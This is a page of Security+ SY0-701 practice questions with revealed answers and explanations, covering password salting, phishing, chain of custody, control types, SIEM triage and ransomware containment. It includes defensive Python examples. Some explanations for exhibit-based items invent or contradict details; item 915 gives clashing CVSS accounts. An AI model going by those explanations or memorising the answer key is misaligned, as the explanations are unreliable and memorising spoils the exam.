Security+ SY0-701 (SY0-701) — Questions 901–975

1152 questions total · 16 pages · All types, answers revealed

Page 13 of 16

901
Multi-Select · hard

A company stores application passwords in a database that could be stolen during a breach. The team wants to prevent attackers from using precomputed tables and also make identical passwords produce different stored values. Which two changes should be implemented? Select two.

Select 2 answers
A. Use a unique random salt for every password before hashing.
B. Use a slow one-way password hash such as Argon2, bcrypt, or scrypt.
C. Encrypt each password with a single symmetric key and store the key in the database.
D. Add a digital signature to each stored password so users can verify it.
E. Hash all passwords with the same unsalted SHA-256 value.
Answers: A, B

Unique salts defeat rainbow tables and ensure matching passwords do not produce identical outputs.

Why this answer

A unique random salt ensures that even if two users have the same password, their stored hashes differ because the salt is combined with the password before hashing. This prevents attackers from using precomputed rainbow tables, as each salt forces a separate table to be generated. Salting does not slow down the hash itself, but it eliminates the efficiency of precomputed attacks.

Exam trap

The trap here is that candidates often think encryption (Option C) is sufficient for password storage, but encryption with a stored key is reversible and vulnerable if the key is compromised, whereas hashing with a salt is one-way and specifically designed to resist precomputed attacks.
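To make answers A and B concrete, here is an added example (not part of the question bank) that stores passwords with a unique random salt and a slow KDF (scrypt from Python's standard library), verifies them in constant time, and contrasts the result with the unsalted SHA-256 of answer E. The scrypt parameters and the sample passwords are constructed for the demo.

```python
"""Added example: per-password random salt + slow KDF (scrypt), as in
answers A and B of question 901. Not code from the question bank."""
import base64
import hashlib
import hmac
import os
from typing import Optional

# Constructed parameters for the demo. n is kept modest so the example runs
# quickly; production deployments use larger values (memory = 128 * r * n bytes).
SCRYPT_N = 2 ** 14
SCRYPT_R = 8
SCRYPT_P = 1
SALT_BYTES = 16
KEY_BYTES = 32


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: scrypt$n$r$p$salt$key (salt/key base64).

    A fresh random salt is drawn per call, so two users with the same password
    get different stored values (answer A). The salt is stored alongside the
    hash; it is not secret, it only defeats precomputation.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_BYTES)
    fields = ["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
              base64.b64encode(salt).decode("ascii"),
              base64.b64encode(key).decode("ascii")]
    return "$".join(fields)


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and parameters; compare in constant time."""
    try:
        scheme, n, r, p, salt_b64, key_b64 = record.split("$")
        if scheme != "scrypt":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(key_b64)
        actual = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                                n=int(n), r=int(r), p=int(p), dklen=len(expected))
    except (ValueError, TypeError):
        # Malformed record: treat as a failed verification, never as success.
        return False
    return hmac.compare_digest(actual, expected)


def unsalted_sha256(password: str) -> str:
    """Answer E for contrast: identical passwords collide, and a single
    precomputed table of sha256(password) -> password cracks every account."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def precomputed_table_hits(stored_records, wordlist, fingerprint):
    """Simulate a precomputed-table attack: the attacker computes fingerprint(word)
    once per word and looks each stored value up. Returns the number of records
    recovered. For salted records the table never matches because the stored
    value depends on a salt the attacker could not precompute."""
    table = {fingerprint(word): word for word in wordlist}
    return sum(1 for rec in stored_records if rec in table)


def demo():
    """Show the two properties the question asks for on constructed inputs."""
    pw = "Summer2024!"                      # constructed sample password
    salted_a, salted_b = hash_password(pw), hash_password(pw)
    plain_a, plain_b = unsalted_sha256(pw), unsalted_sha256(pw)
    words = ["password", "Summer2024!", "letmein"]   # constructed wordlist
    return {
        "salted_values_differ": salted_a != salted_b,
        "unsalted_values_differ": plain_a != plain_b,
        "verify_correct": verify_password(pw, salted_a),
        "verify_wrong": verify_password("summer2024!", salted_a),
        "table_hits_unsalted": precomputed_table_hits([plain_a, plain_b], words, unsalted_sha256),
        # Attacker precomputes scrypt with a fixed salt of zeros; it never matches.
        "table_hits_salted": precomputed_table_hits(
            [salted_a, salted_b], words, lambda w: hash_password(w, b"\x00" * SALT_BYTES)),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```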

902
MCQ · easy

An employee receives an email that appears to be from the CEO and asks for an urgent wire transfer. The sender address is slightly different from the real company address. What is the best first action?

A. Complete the transfer because it came from an executive
B. Reply to the email asking if it is real
C. Verify the request using a separate trusted method
D. Forward it to the whole department for awareness
Answer: C

The safest first action is to verify the request through a separate trusted channel, such as calling the CEO using a known internal number or checking with a supervisor. This helps confirm whether the message is legitimate without relying on the suspicious email itself. Urgent money requests are a common social engineering tactic, so independent verification is essential.

Why this answer

Option C is correct because the email exhibits classic signs of a business email compromise (BEC) attack, where the sender address is spoofed or slightly altered. Verifying the request through a separate, trusted method—such as calling the CEO directly or using a known internal communication channel—bypasses any compromised email system and confirms the legitimacy of the request. This aligns with the principle of out-of-band verification, which is a key defense against phishing and social engineering.

Exam trap

CompTIA often tests the concept that verifying through the same compromised channel (e.g., replying to the email) is insufficient, and the trap here is that candidates may think replying to ask for confirmation is a safe step, when in fact it only engages with the attacker.

How to eliminate wrong answers

Option A is wrong because it assumes the email is legitimate based solely on the display name or role, ignoring the fact that attackers can easily spoof sender addresses and exploit authority to bypass security controls. Option B is wrong because replying to the email sends the response to the attacker-controlled address, confirming the employee's availability and potentially exposing sensitive information; the attacker may also intercept or manipulate the reply. Option D is wrong because forwarding the email to the entire department spreads the phishing attempt, increasing the risk that other employees might fall for the attack or that the malicious content could trigger additional security incidents.

903
MCQ · medium

A manager asks the security team to let Human Resources inspect the files on a laptop suspected of containing stolen customer data before IT touches it. What is the best response?

A. Let HR browse the files first so they can confirm whether the data is sensitive.
B. Create a forensic image of the device, document the handoff, and maintain chain of custody before any analysis.
C. Copy the files to a shared drive so multiple departments can review them quickly.
D. Factory reset the laptop immediately to prevent further leakage of customer data.
Answer: B

When a device may contain evidence, the priority is to preserve it in a way that supports later analysis and legal defensibility. Creating a forensic image captures the data without modifying the original device, and documenting each transfer maintains chain of custody. This approach protects evidence integrity and allows authorized investigators to review the copy instead of the live system. It is the correct response before HR or others inspect the contents.

Why this answer

Option B is correct because the first priority in any investigation involving potential evidence is to preserve the data in its original state. Creating a forensic image (bit-for-bit copy) ensures that the original media is not altered, and documenting the handoff with a chain of custody form provides a verifiable audit trail. This process adheres to forensic best practices and legal requirements, preventing spoliation of evidence before any analysis begins.

Exam trap

The trap here is that candidates may think HR needs immediate access to confirm sensitivity, but they overlook the forensic requirement to preserve the original state of the evidence before any access or analysis occurs.

How to eliminate wrong answers

Option A is wrong because allowing HR to browse the files directly on the live laptop would modify metadata (e.g., file access times, last opened dates) and could potentially alter or delete data, compromising the integrity of the evidence. Option C is wrong because copying files to a shared drive without first creating a forensic image risks altering file timestamps and metadata during the copy process, and it bypasses proper chain of custody, making the evidence inadmissible. Option D is wrong because factory resetting the laptop would destroy all data, including any evidence of the alleged theft, making it impossible to conduct a forensic investigation and potentially violating legal hold requirements.

904
MCQ · easy

A coworker asks for a spreadsheet containing employee home addresses and personal phone numbers so they can build a team contact list. What is the best response?

A. Share the spreadsheet, because the request is from another employee inside the company.
B. Confirm the requester is authorized and only provide the minimum personal data allowed by policy.
C. Email the full spreadsheet, because internal data is not protected by privacy rules.
D. Delete the spreadsheet immediately so the information cannot be misused.
Answer: B

The best response is to verify authorization and limit the data shared to the minimum needed. Privacy and data-handling rules often restrict personal information such as home addresses and personal phone numbers. Even internal requests should follow approved business purpose, least privilege, and data minimization principles before any disclosure occurs.

Why this answer

Option B is correct because it aligns with the principle of least privilege and data minimization, which are core to security program management. Even internal requests must be verified for authorization, and only the minimum personal data required for the stated purpose should be shared, as per organizational policy and privacy regulations like GDPR or CCPA.

Exam trap

The trap here is that candidates may assume internal requests are automatically safe, ignoring the need for authorization and data minimization, which is a common misconception tested in SY0-701.

How to eliminate wrong answers

Option A is wrong because it assumes that internal employment automatically grants authorization to access sensitive PII, which violates data access control policies. Option C is wrong because internal data, especially PII like home addresses and phone numbers, is protected by privacy rules and regulations; emailing the full spreadsheet without controls exposes the organization to data breach risks. Option D is wrong because deleting the spreadsheet is an overreaction that does not address the legitimate business need and may violate data retention policies; the correct action is to follow policy for authorized access.

905
MCQ · easy

A help desk technician needs temporary access to read one shared folder to troubleshoot a printer issue. Which access choice best follows least privilege?

A. Grant the technician full control of the entire file server for one day.
B. Give the technician read-only access to the single shared folder needed for the ticket.
C. Add the technician to the domain admins group until the issue is resolved.
D. Allow the technician to use any account in the department for convenience.
Answer: B

Least privilege means granting only the minimum access needed to complete the task. Read-only access to one specific folder supports troubleshooting without exposing unrelated files or administrative functions.

Why this answer

Option B is correct because it grants the technician only the minimum permissions (read-only) to the specific resource (single shared folder) required to troubleshoot the printer issue. This adheres to the principle of least privilege by limiting access scope and duration, reducing the risk of unauthorized changes or data exposure.

Exam trap

The trap here is that candidates often confuse 'temporary access' with 'elevated privileges' (like Domain Admins) instead of recognizing that the least privilege principle requires the minimal permission (read-only) to the minimal resource (single folder), not broad administrative roles.

How to eliminate wrong answers

Option A is wrong because granting full control of the entire file server provides far more access than needed, violating least privilege and exposing all files to potential accidental modification or deletion. Option C is wrong because adding the technician to the Domain Admins group grants unrestricted administrative access to the entire domain, which is excessive and introduces significant security risk. Option D is wrong because allowing the technician to use any department account bypasses accountability and audit trails, as actions cannot be tied to the specific technician, and may expose credentials or sensitive data.

906
MCQ · easy

A help desk technician receives a phone call from someone claiming to be a contractor. The caller says their MFA app was lost, asks the technician to enroll a new device immediately, and pressures them to ignore policy. What type of attack is this?

A. Phishing
B. Vishing
C. Smishing
D. Baiting
Answer: B

Vishing uses voice calls to pressure a target into revealing information or changing security settings.

Why this answer

This is a vishing (voice phishing) attack because the attacker uses a phone call to impersonate a contractor and socially engineer the technician into bypassing MFA enrollment policies. Vishing specifically exploits voice communication to manipulate victims, unlike phishing which uses email or malicious links.

Exam trap

The trap here is confusing vishing with phishing because both involve social engineering, but the key differentiator is the communication medium—voice (phone call) vs. electronic message (email/SMS).

How to eliminate wrong answers

Option A is wrong because phishing involves deceptive emails or messages with malicious links/attachments, not a direct phone call. Option C is wrong because smishing uses SMS text messages to trick victims, not voice calls. Option D is wrong because baiting relies on offering something enticing (e.g., a free USB drive) to lure victims into a trap, not a phone-based social engineering request.

907
MCQ · hard

Based on the exhibit, what control type is the automated reapplication of the baseline?

A. Preventive control, because the system prevented the user from changing the firewall profile at all.
B. Corrective control, because the MDM agent restores the approved baseline after the unauthorized change is found.
C. Detective control, because the help desk can review the event later.
D. Deterrent control, because the policy baseline discourages users from making changes.
Answer: B

Corrective control is the best answer because the system repairs the deviation after it has already happened. The user altered the firewall profile, and then the management platform reapplied the approved baseline at the next check-in. This restores the device to the desired secure state, which is exactly what a corrective control is designed to do.

Why this answer

The automatic reapplication of the approved firewall baseline is a corrective control because it fixes a configuration that drifted away from the secure standard. The user was able to make the change, so the control was not preventive. The MDM system then returned the device to its approved state, which is the defining behavior of correction rather than simple detection or deterrence.

Why others are wrong: The user change was already allowed to happen, so the control was not preventive. The log shows an automatic restoration, not just an alert, so it is more than detective. A deterrent would merely discourage changes through warnings or visibility. The key evidence is the platform's automatic rollback to the approved baseline after the deviation was found.

908
MCQ · medium

A project lead needs to send a spreadsheet labeled confidential to an external auditor. The file contains employee names, salaries, and performance notes. Which handling step best protects the data while still supporting the business need?

A. Email the attachment unencrypted if the auditor signed an NDA
B. Use an approved encrypted file-sharing portal with named recipients and access logging
C. Upload the spreadsheet to a public link so the auditor can access it easily
D. Remove the confidential label before sending it to avoid confusion
Answer: B

Approved encrypted sharing limits access to intended recipients and creates traceability for audit and oversight.

Why this answer

Option B is correct because using an approved encrypted file-sharing portal with named recipients and access logging ensures data-in-transit and data-at-rest encryption, restricts access to only the intended auditor, and provides an audit trail for compliance. This approach meets the business need of securely sharing confidential employee data while supporting regulatory requirements like GDPR or HIPAA, unlike unencrypted email which exposes data to interception.

Exam trap

The trap here is that candidates may think an NDA alone provides sufficient protection, overlooking that encryption and access controls are required to prevent data breaches during transmission and storage.

How to eliminate wrong answers

Option A is wrong because emailing an unencrypted attachment, even with an NDA in place, exposes the data to interception during transit (e.g., via TLS stripping or man-in-the-middle attacks) and does not provide encryption or access controls. Option C is wrong because uploading the spreadsheet to a public link makes the data accessible to anyone with the link, violating confidentiality and lacking authentication or logging. Option D is wrong because removing the confidential label does not change the sensitivity of the data; it merely obscures the classification, leading to potential mishandling and non-compliance with data protection policies.

909
MCQ · easy

A security team wants to reduce repeated user mistakes after a phishing campaign without overwhelming employees with long training sessions. Which approach is best?

A. Send a short, targeted reminder to the affected users with a clear reporting path
B. Require every employee to attend a full-day security class immediately
C. Wait until the next annual training cycle and do nothing now
D. Disable email access for all employees until they pass a new test
Answer: A

A short targeted reminder is practical, timely, and focused on the specific behavior that needs improvement.

Why this answer

Option A is correct because it applies targeted, immediate reinforcement to the specific users who made mistakes, using a short reminder that clarifies the reporting path. This approach leverages just-in-time training, which has been shown to improve retention and behavior change without overwhelming employees. It directly addresses the root cause—repeated user errors—by providing a clear, actionable step (e.g., 'Report suspicious emails using the PhishAlarm button') rather than generic awareness.

Exam trap

The trap here is that candidates may choose option B (full-day class) because they overestimate the value of comprehensive training, failing to recognize that targeted, immediate reinforcement is more effective for correcting specific, repeated mistakes without causing training fatigue.

How to eliminate wrong answers

Option B is wrong because a full-day security class is overly time-consuming and likely to cause training fatigue, reducing overall effectiveness and not targeting the specific users who made mistakes. Option C is wrong because waiting until the next annual training cycle leaves the repeated mistakes unaddressed, allowing the same vulnerabilities to persist and potentially lead to a successful breach. Option D is wrong because disabling email access for all employees is a drastic, disruptive measure that punishes the entire workforce, including those who did not make mistakes, and does not provide any educational value or fix the underlying behavior.

910
MCQ · hard

Based on the exhibit, what is the best handling decision for the requested file?

A. Share the full file by email as Confidential because only the last four digits of the SSN are included.
B. Label it Public because the contractor needs the information to troubleshoot effectively.
C. Mark it Internal and place it on the shared project drive for easy access.
D. Treat it as Restricted, redact unnecessary fields, and provide only the minimum approved dataset through a logged encrypted transfer.
Answer: D

The file contains customer PII, financial information, and case notes, so it should be handled as Restricted rather than merely Confidential. The policy requires minimization, masking where possible, owner approval, time-limited access, and logged sharing. Because the request comes from an external contractor, the organization should provide only the least amount of data needed, with encryption and formal approval.

Why this answer

Option D is correct because the file contains personally identifiable information (PII) in the form of a Social Security Number (SSN), which requires handling under a Restricted classification per most data governance frameworks. The correct procedure is to redact unnecessary fields, such as the full SSN, and transmit only the minimum approved dataset via a logged encrypted transfer (e.g., using SFTP or HTTPS with TLS 1.2+) to ensure confidentiality, integrity, and auditability. This aligns with the principle of least privilege and data minimization, which are core to security program management.

Exam trap

The trap here is that candidates may assume that sharing only the last four digits of an SSN makes the data safe to send via email (Option A), but CompTIA tests that any PII, even partial, requires Restricted handling and encrypted transfer to prevent data breaches and comply with regulations like GDPR or HIPAA.

How to eliminate wrong answers

Option A is wrong because sharing the full file by email, even with only the last four digits of the SSN, violates data minimization and exposes residual PII; email is not an approved secure channel for Restricted data and lacks encryption at rest and in transit guarantees. Option B is wrong because labeling the file Public would allow unrestricted access, which is inappropriate for any data containing SSN fragments; the contractor's need to troubleshoot does not override data classification policies. Option C is wrong because marking the file Internal and placing it on a shared project drive does not provide access controls or encryption sufficient for PII, and it fails to redact unnecessary fields, exposing the full SSN to unauthorized personnel.

911
MCQ · easy

A department finished using paper forms that contain customer information, and the retention period has expired. What is the best next step?

A. Store them indefinitely in a cabinet for future reference
B. Dispose of them using approved secure destruction methods
C. Send them to another team without checking the retention schedule
D. Scan them to personal email so the department can keep a copy
Answer: B

Approved secure destruction ensures the expired records cannot be easily recovered or misused later.

Why this answer

Option B is correct because once the retention period has expired, the organization must securely destroy the paper forms to prevent unauthorized access to customer information. Approved secure destruction methods for paper records include cross-cut shredding, incineration, or pulping, which render the data irrecoverable and comply with data protection regulations like GDPR or HIPAA.

Exam trap

The trap here is that candidates may think indefinite storage (A) is acceptable for future reference, but the expired retention period legally requires destruction, not just storage.

How to eliminate wrong answers

Option A is wrong because storing expired records indefinitely violates data minimization principles and retention policies, increasing the risk of data breaches and non-compliance with regulations. Option C is wrong because sending records to another team without verifying the retention schedule could propagate sensitive data beyond its authorized lifecycle, leading to unauthorized access or legal penalties. Option D is wrong because scanning customer information to personal email bypasses organizational controls, creates an unsecured copy, and violates data handling policies, potentially exposing the data to loss or interception.

912
MCQ · hard

A records application displays a mandatory notice before login that tells employees exactly which data types they may open, when to lock their screens, and that only assigned work may be processed. The notice is meant to shape behavior before misuse occurs, but it does not technically block any action. Which control type is this notice?

A. Directive control
B. Preventive control
C. Deterrent control
D. Detective control
Answer: A

The notice provides required guidance and expectations before users access the system. It tells them what behavior is allowed and how they should act, but it does not enforce the rule technically. That makes it a directive control because it directs user behavior through instructions and stated requirements rather than by blocking actions.

Why this answer

A directive control is designed to guide or mandate behavior through policies, procedures, or notices without enforcing technical restrictions. This notice explicitly tells employees which data types they may open, when to lock screens, and that only assigned work may be processed, shaping behavior before misuse occurs without blocking any action. It aligns with the definition of a directive control as it provides rules and expectations rather than preventing or deterring actions through technical means.

Exam trap

The trap here is that candidates confuse a directive control with a deterrent control because both involve warnings, but a deterrent control explicitly threatens consequences or punishment to discourage action, whereas a directive control simply instructs on proper behavior without implying enforcement or penalties.

How to eliminate wrong answers

Option B is wrong because a preventive control would technically block unauthorized actions, such as using access control lists (ACLs) or file permissions to prevent opening restricted data types, whereas this notice only advises without enforcing any technical barrier. Option C is wrong because a deterrent control aims to discourage misuse through the threat of consequences or penalties, such as warning banners that imply monitoring or disciplinary action, but this notice simply states allowed behaviors without threatening punishment or creating fear of repercussions.

913
MCQ · medium

A SIEM alert flags an interactive logon to a Windows file server from a service account that normally only runs scheduled tasks. The alert occurred at 01:12, but the maintenance window for that server is every Sunday at 02:00. The account also accessed a different server five minutes later. What should the analyst do first?

A. Ignore the alert because service accounts often authenticate outside normal business hours.
B. Correlate the activity with the change calendar, scheduled-task logs, and ticketing records before escalating.
C. Immediately disable the service account to stop any potential attacker activity.
D. Reimage the file server to remove any possible compromise.
Answer: B

The best first step in triage is to determine whether the activity is authorized or anomalous. Because service-account use can be legitimate, the analyst should correlate the logon with maintenance windows, scheduled-task history, and approved change records. That quickly separates normal administrative activity from suspicious lateral movement without prematurely disrupting operations.

Why this answer

Option B is correct because the analyst must first gather context to determine if the alert is a false positive or a genuine security incident. The interactive logon at 01:12 is outside the scheduled maintenance window (Sunday 02:00), and the account’s subsequent access to another server warrants correlation with change calendars, scheduled-task logs, and ticketing records to verify if the activity was authorized. This step prevents unnecessary disruption while ensuring that any anomalous behavior is properly investigated before escalation.

Exam trap

The trap here is that candidates may assume any activity outside business hours is automatically malicious or, conversely, that service accounts always authenticate at odd hours, leading them to ignore the alert—when the key is to recognize that the interactive logon type and the deviation from the maintenance window are the specific anomalies requiring correlation.

How to eliminate wrong answers

Option A is wrong because ignoring the alert based solely on the time of day overlooks the specific anomaly: the account performed an interactive logon (type 2 or 10) rather than its usual scheduled-task logon (type 5), and the activity occurred outside the defined maintenance window. Option C is wrong because immediately disabling the service account without investigation could disrupt legitimate operations and destroy forensic evidence; the analyst should first verify if the activity was authorized via change records. Option D is wrong because reimaging the server is a drastic, irreversible step that should only be taken after confirming compromise through proper forensic analysis and incident response procedures.
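The correlation step in answer B can be scripted. The following is an added example (not the question bank's own code) that parses constructed Windows 4624 logon records, flags an interactive logon by a service account, checks it against the maintenance window and change tickets, and notes follow-on access to a second host within a short window. The account name, hosts, timestamps and ticket records are all constructed for the demo.

```python
"""Added example: triage logic for the alert in question 913.
All event lines, accounts, hosts and tickets are constructed for the demo."""
from datetime import datetime, timedelta

# Windows logon types relevant here: 2 = Interactive, 10 = RemoteInteractive (RDP),
# 3 = Network, 4 = Batch (scheduled task), 5 = Service.
INTERACTIVE_TYPES = {2, 10}
SERVICE_ACCOUNTS = {"svc_backup"}                  # constructed account inventory
MAINTENANCE = {"weekday": 6, "start_hour": 2, "end_hour": 4}  # Sunday 02:00-04:00
LATERAL_WINDOW = timedelta(minutes=15)             # follow-on access to another host

# Constructed 4624 (successful logon) records in key=value form.
# 2024-05-12 is a Sunday; 01:12 is before the 02:00 maintenance window.
SAMPLE_EVENTS = [
    "time=2024-05-12T01:12:00 id=4624 type=10 account=svc_backup host=FS01 src=10.0.5.23",
    "time=2024-05-12T01:17:00 id=4624 type=3 account=svc_backup host=APP02 src=10.0.5.23",
    "time=2024-05-12T02:05:00 id=4624 type=4 account=svc_backup host=FS01 src=-",
    "time=2024-05-12T09:30:00 id=4624 type=2 account=jdoe host=WS17 src=-",
]
# Constructed change tickets: (account, host, start ISO time, end ISO time).
CHANGE_TICKETS = [
    ("svc_backup", "FS01", "2024-05-12T02:00:00", "2024-05-12T04:00:00"),
]


def parse_event(line):
    """Turn one key=value record into a dict with typed time/id/type fields."""
    ev = dict(kv.split("=", 1) for kv in line.split())
    ev["time"] = datetime.fromisoformat(ev["time"])
    ev["id"] = int(ev["id"])
    ev["type"] = int(ev["type"])
    return ev


def in_maintenance_window(t):
    return (t.weekday() == MAINTENANCE["weekday"]
            and MAINTENANCE["start_hour"] <= t.hour < MAINTENANCE["end_hour"])


def covered_by_ticket(ev, tickets):
    """True if an approved ticket covers this account on this host at this time."""
    for account, host, start, end in tickets:
        if (account == ev["account"] and host == ev["host"]
                and datetime.fromisoformat(start) <= ev["time"] <= datetime.fromisoformat(end)):
            return True
    return False


def triage(lines, tickets=CHANGE_TICKETS):
    """Return findings for interactive logons by service accounts. Each finding
    carries the reasons it was flagged and a status: escalate, or authorized when
    a change ticket covers it (the 'correlate before escalating' step)."""
    events = [parse_event(line) for line in lines]
    findings = []
    for ev in events:
        if ev["id"] != 4624 or ev["account"] not in SERVICE_ACCOUNTS:
            continue
        if ev["type"] not in INTERACTIVE_TYPES:
            continue  # batch/service/network logons are the account's expected pattern
        reasons = ["interactive logon (type %d) by service account" % ev["type"]]
        if not in_maintenance_window(ev["time"]):
            reasons.append("outside maintenance window")
        # Follow-on access to a different host shortly afterwards.
        for other in events:
            if (other["account"] == ev["account"] and other["host"] != ev["host"]
                    and ev["time"] < other["time"] <= ev["time"] + LATERAL_WINDOW):
                delta = int((other["time"] - ev["time"]).total_seconds() // 60)
                reasons.append("accessed %s %d min later" % (other["host"], delta))
                break
        status = "authorized (change ticket)" if covered_by_ticket(ev, tickets) else "escalate"
        findings.append({"time": ev["time"].isoformat(), "account": ev["account"],
                         "host": ev["host"], "reasons": reasons, "status": status})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["status"], f["account"], f["host"], f["time"], "; ".join(f["reasons"]))
```

Only the 01:12 RDP logon is flagged; the 02:05 batch logon inside the window is the account's normal pattern, and the same event is reported as authorized when a ticket covering 01:00 to 02:00 is supplied instead.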

914
Multi-Select · hard

A company distributes update packages through a web portal. Users must verify the portal's identity over the network, and the downloaded packages must be trusted even if the web server is later compromised. Which two controls best satisfy these goals? Select two.

Select 2 answers
A. Use HTTPS with a certificate from a trusted certificate authority so users can validate the portal.
B. Use FTP over the internet because the credentialed login keeps the transfer secure enough.
C. Digitally sign the update packages so clients can verify integrity even if the web server is later compromised.
D. Publish a SHA-256 hash on the same download page and trust that the server will remain honest.
E. Use plain HTTP and rely on file permissions to protect the updates in transit.
Answers: A, C

HTTPS protects the connection in transit and lets clients validate that they are communicating with the expected portal through trusted certificate chains. That addresses the need to confirm the portal's identity over the network and prevents interception or modification by an attacker on the path.

Why this answer

HTTPS with a certificate from a trusted certificate authority (CA) allows the client to validate the web portal's identity by verifying the certificate's chain of trust and ensuring the domain name matches. This prevents man-in-the-middle attacks and confirms the server is legitimate before any data is exchanged.

Exam trap

The trap here is that candidates may think FTP with credentials is sufficient for identity verification, but FTP does not provide certificate-based server authentication, and the question specifically requires verifying the portal's identity over the network, which only HTTPS with a trusted CA certificate achieves.

915
MCQ · hard

Based on the exhibit, which finding should be remediated first?

A. Finding A
B. Finding B
C. Finding C
D. Finding D
Answer: A

Finding A combines internet exposure, remote code execution, and active exploitation in the wild, making it the most urgent risk even if another item has a slightly higher CVSS score. Exposure and exploitability matter more than score alone. A patch is available, so remediation can reduce the window of opportunity quickly. In Security+ style prioritization, reachable, actively exploited weaknesses on public-facing systems rise to the top.

Why this answer

Finding A indicates a critical vulnerability with a CVSS score of 9.8, which is the highest severity among the findings. Remediation should prioritize the most severe risk to minimize potential impact, as this vulnerability could allow remote code execution without authentication.

Exam trap

The trap here is that candidates might choose a finding based on the number of affected systems or a misleading description, rather than strictly prioritizing by CVSS severity score as CompTIA expects.

How to eliminate wrong answers

Option B is wrong because its CVSS score of 7.5 is lower than Finding A's 9.8, and while it represents a high-severity issue, it does not pose the same immediate risk of unauthenticated remote compromise. Option C is wrong because it has a CVSS score of 6.2, which is medium severity, and typically involves a local attack vector or requires user interaction, making it less urgent than a critical remote exploit. Option D is wrong because its CVSS score of 4.3 is low severity, often related to information disclosure or minor misconfigurations, and should be addressed after critical and high-severity findings.

916
MCQ · easy

A vendor says a patch for a critical flaw in a public-facing application will not be available for 30 days, but the service must stay online. What is the best short-term risk treatment?

A. Accept the risk without making any changes because the patch is not available yet.
B. Avoid the risk by permanently shutting down the application.
C. Transfer the risk to an insurance policy and wait for the patch.
D. Implement compensating controls, such as tighter filtering and temporary restrictions, until the patch is released.
Answer: D

This is the best option because the business must keep the application online, but the known vulnerability still needs risk reduction. Compensating controls are temporary safeguards that lower exposure when a permanent fix is unavailable. Examples include stricter access filtering, disabling unnecessary features, or adding monitoring until the vendor patch can be applied safely.

Why this answer

Option D is correct because when a critical patch is unavailable, the best short-term risk treatment is to implement compensating controls that reduce the likelihood or impact of exploitation. For a public-facing application, this could include deploying a web application firewall (WAF) with tighter rule sets, rate limiting, IP allowlisting, or temporarily disabling non-essential functionality. These controls provide a defense-in-depth layer until the vendor releases the patch, keeping the service online while reducing risk.

Exam trap

CompTIA often tests the misconception that risk acceptance is a valid short-term treatment when a patch is delayed, but the key is that acceptance is only appropriate after evaluating and documenting the risk, not as a default action without controls.

How to eliminate wrong answers

Option A is wrong because accepting the risk without any changes leaves the application fully exposed to a known critical flaw, which is irresponsible and could lead to a breach. Option B is wrong because permanently shutting down the application avoids the risk but disrupts business operations entirely, which is not a short-term treatment and fails the requirement that the service must stay online. Option C is wrong because transferring the risk to an insurance policy does not reduce the technical exposure; insurance covers financial loss after an incident but does not prevent exploitation of the vulnerability.

917
MCQeasy

During a tabletop exercise, the team realizes no one has a list of who to notify if the online ordering system goes down. Which continuity planning element is missing?

A.Data retention schedule, because it defines how long records are kept.
B.Communication plan, because it defines who must be contacted and how.
C.Asset inventory, because it lists all hardware and software in use.
D.Network segmentation, because it separates sensitive systems from user networks.
AnswerB

A communication plan identifies the people, groups, and channels used during an outage or incident. If no one knows who to notify, the organization lacks a key continuity component that supports coordinated response and stakeholder awareness.

Why this answer

A communication plan is the missing continuity planning element because it specifically defines the stakeholders who must be notified during an outage (e.g., internal teams, vendors, customers) and the methods of contact (e.g., email, SMS, phone tree). Without this plan, the team cannot execute the notification procedures required by the business continuity plan (BCP) to coordinate response and recovery efforts for the online ordering system.

Exam trap

The trap here is that candidates confuse an asset inventory (which lists what you have) with a communication plan (which lists who to call), leading them to pick Option C because they think knowing the system's hardware is necessary for notification, but the question specifically asks about 'who to notify,' not 'what is affected.'

How to eliminate wrong answers

Option A is wrong because a data retention schedule governs how long records are kept (e.g., PCI DSS requires audit logs to be retained for at least 12 months), not who to notify during an outage. Option C is wrong because an asset inventory lists hardware and software (e.g., server models, OS versions) but does not define notification contacts or escalation paths. Option D is wrong because network segmentation (e.g., VLANs, firewall zones) isolates sensitive systems for security, but it does not address the operational need to contact personnel when a system fails.

918
Multi-Selectmedium

An organization is implementing a new Security Information and Event Management (SIEM) system. Which three of the following are primary capabilities that a SIEM provides to support security operations? (Choose three.)

Select 3 answers
A.Correlation of log data from multiple sources to identify patterns of suspicious activity
B.Real-time alerting based on predefined security rules and anomalies
C.Long-term storage and retention of logs for compliance and forensic analysis
D.Automated patching of operating system vulnerabilities across the enterprise
E.Blocking malicious network traffic at the perimeter firewall
F.Performing vulnerability scans on internal hosts and applications
AnswersA, B, C

Why this answer

A SIEM system's primary capabilities include aggregating and correlating log data from diverse sources (servers, firewalls, endpoints) to detect patterns indicative of security incidents. It provides real-time alerting by applying predefined correlation rules and anomaly detection algorithms to streaming log events. Additionally, SIEM solutions offer long-term log storage and retention, which is essential for compliance audits (e.g., PCI DSS, HIPAA) and post-incident forensic analysis.

Exam trap

The trap here is that candidates confuse a SIEM's ability to ingest and analyze data from other security tools with the ability to perform those tools' native functions (like patching, blocking, or scanning), leading them to select options that describe actions a SIEM cannot directly execute.

919
MCQmedium

A file server in the accounting department begins renaming documents and dropping ransom notes. The SOC confirms encryption is still in progress, and the server hosts a share used by several finance teams. What should the incident response team do first?

A.Disconnect the server from the network to contain the spread.
B.Restore the file share from backup immediately while the server is still connected.
C.Power off the server immediately without any other action.
D.Notify users to change their passwords before any technical action is taken.
AnswerA

Immediate network isolation stops further encryption, reduces lateral movement, and protects other systems. In ransomware events, containment is the first priority once the incident is confirmed and active.

Why this answer

Disconnecting the server from the network is the immediate containment step to prevent the ransomware from encrypting additional files on the share or spreading laterally to other systems. Since encryption is still in progress, isolating the server stops the attacker's process from accessing more files and blocks any command-and-control (C2) communication. This aligns with the NIST incident response framework's containment phase, prioritizing stopping the spread over recovery or notification.

Exam trap

The trap here is that candidates may prioritize data recovery (Option B) or user notification (Option D) over containment, failing to recognize that the immediate priority is stopping active encryption to limit damage.

How to eliminate wrong answers

